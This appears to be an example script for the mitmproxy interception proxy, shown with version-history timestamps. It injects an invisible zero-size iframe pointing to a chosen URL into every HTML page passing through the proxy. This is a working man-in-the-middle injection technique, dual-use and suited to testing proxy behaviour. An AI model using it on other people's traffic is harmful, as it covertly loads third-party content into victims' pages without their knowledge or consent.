2014-09-05 13:05:44 +00:00
|
|
|
# Usage: mitmdump -s "iframe_injector.py url"
|
|
|
|
# (this script works best with --anticache)
|
2016-06-14 01:17:09 +00:00
|
|
|
import sys
|
2014-09-12 00:42:45 +00:00
|
|
|
from bs4 import BeautifulSoup
|
2016-02-16 19:49:10 +00:00
|
|
|
from mitmproxy.models import decoded
|
2014-09-05 13:05:44 +00:00
|
|
|
|
|
|
|
|
2016-06-14 01:17:09 +00:00
|
|
|
def start(context):
|
|
|
|
if len(sys.argv) != 2:
|
2014-09-05 13:05:44 +00:00
|
|
|
raise ValueError('Usage: -s "iframe_injector.py url"')
|
2016-06-14 01:17:09 +00:00
|
|
|
context.iframe_url = sys.argv[1]
|
2014-09-05 13:05:44 +00:00
|
|
|
|
|
|
|
|
2014-09-12 00:42:45 +00:00
|
|
|
def response(context, flow):
|
|
|
|
if flow.request.host in context.iframe_url:
|
|
|
|
return
|
2014-09-05 13:05:44 +00:00
|
|
|
with decoded(flow.response): # Remove content encoding (gzip, ...)
|
2016-03-07 04:40:29 +00:00
|
|
|
html = BeautifulSoup(flow.response.content, "lxml")
|
2014-09-12 00:42:45 +00:00
|
|
|
if html.body:
|
2015-05-30 00:03:28 +00:00
|
|
|
iframe = html.new_tag(
|
|
|
|
"iframe",
|
|
|
|
src=context.iframe_url,
|
|
|
|
frameborder=0,
|
|
|
|
height=0,
|
|
|
|
width=0)
|
2014-09-12 00:42:45 +00:00
|
|
|
html.body.insert(0, iframe)
|
2016-07-08 00:50:26 +00:00
|
|
|
flow.response.content = str(html).encode("utf8")
|
2015-05-30 00:03:28 +00:00
|
|
|
context.log("Iframe inserted.")
|